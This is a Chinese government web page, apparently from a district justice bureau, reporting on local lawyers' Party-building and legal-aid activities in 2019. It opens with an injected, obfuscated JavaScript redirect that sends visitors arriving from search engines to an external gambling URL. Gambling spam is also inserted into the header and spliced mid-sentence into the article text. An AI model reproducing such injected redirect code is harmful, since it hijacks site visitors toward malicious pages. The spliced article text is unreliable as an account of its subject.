var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

bbin宝盈,bbin下载

您的当前位置:首页 > 律师管理·公证管理
发布日期:2019-10-24 浏览次数: 字号:[ ]

南湖区律师行业党委结合律师行业工作实际,强化党员律师责任担当,深入学习,加强走访,以真服务、深服务、大服务和好成效将“不忘初心、牢记使命”主题教育落到实处。  

一是打造最红律师党建服务品牌。深化“律政先锋”党支部创建工作,打造“一支部一服务品牌”,结合工作,对全区15个律师事务所党支部进行走访调研,鼓励党员律师服务中心工作,积极参与社会活动,要求各党支部对党建服务品牌活动中的亮点工作、典型经验及时加以提炼、宣传和推广。9月中旬,局党委书记、局长马波亲自带队赴浙江隆智律师事务所、北京(盈科)律师事务所等区属律师事务所党支部开展调研走访,召开座谈会,听取意见建议。  

二是树立最为放心服务口碑。深化“网格连心、组团服务”工作,引导党员律师走进网格、深入群众,面对面倾听意见,实打实整改问题,树立良好的社会形象。如浙江隆智律师事务所党支部沈沁梅律师参与全区“壮丽70年 宪法进万家”普法巡回宣讲活动;浙江南湖律师事务所党支部书记吴中琴赴云东社区参加社区活动,免费为群众提供法律咨询。开展精准法律扶贫,参与法律援助志愿行动,选派区属律师赴舟山嵊泗岛开展法律援助工作,为当地提供高效、专业的法律服务,得到当地政府和群众的好评。助力“中心城市品质提升”委派党员律师到综合执法局值班,随队执法,向群众宣传法律知识,化解社会矛盾,努力打造“律师驻队”工作的“南湖样本”。  

三是建设最具影响力律师铁军。以学习为抓手,提升律师队伍的政治素养和业务能力。各律师事务所党支部结合实际情况,以“一书一章”为主要学习内容,自主开展学习活动。如浙江安策律师事务所党支部利用午间休息时间,组织学习《习近平关于“不忘初心、牢记使命”论述摘编》;北京(盈科)律师事务所党支部与bbin宝盈,bbin下载:台州商会党支部开展《中国共产党支部工作条例》联学;南湖区个人律师事务所党支部利用“一支部一微信群”平台,每天在微信群发送主题教育活动相关讯息,要求党员律师进行自主学习。  

南湖区局




打印本页 关闭窗口
Produced By 大汉网络 大汉版通发布系统